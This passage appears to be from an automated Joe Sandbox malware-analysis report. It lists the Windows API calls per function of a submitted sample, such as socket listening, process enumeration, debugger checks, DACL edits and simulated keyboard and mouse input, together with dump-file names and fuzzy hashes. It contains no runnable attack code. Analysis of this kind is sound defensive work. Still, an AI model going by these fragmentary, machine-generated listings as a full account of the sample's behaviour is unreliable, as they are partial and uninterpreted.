                                                                                                                                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1255039815-0
                                                                                                                                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                                              APIs
                                                                                                                                              • __swprintf.LIBCMT ref: 00433073
                                                                                                                                              • __swprintf.LIBCMT ref: 00433085
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                              • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1158019794-0
                                                                                                                                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                              • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                              • API String ID: 4194297153-14809454
                                                                                                                                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove$_strncmp
                                                                                                                                              • String ID: @oH$\$^$h
                                                                                                                                              • API String ID: 2175499884-3701065813
                                                                                                                                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                                              APIs
                                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 540024437-0
                                                                                                                                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                              • API String ID: 0-2872873767
                                                                                                                                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                              • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                              • _wcscat.LIBCMT ref: 00475657
                                                                                                                                              • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2547909840-0
                                                                                                                                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                              • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                              • String ID: *.*$\VH
                                                                                                                                              • API String ID: 2786137511-2657498754
                                                                                                                                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                              APIs
                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                              • String ID: pqI
                                                                                                                                              • API String ID: 2579439406-2459173057
                                                                                                                                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                              APIs
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsicollmouse_event
                                                                                                                                              • String ID: DOWN
                                                                                                                                              • API String ID: 1033544147-711622031
                                                                                                                                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                              APIs
                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3031425849-0
                                                                                                                                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4170576061-0
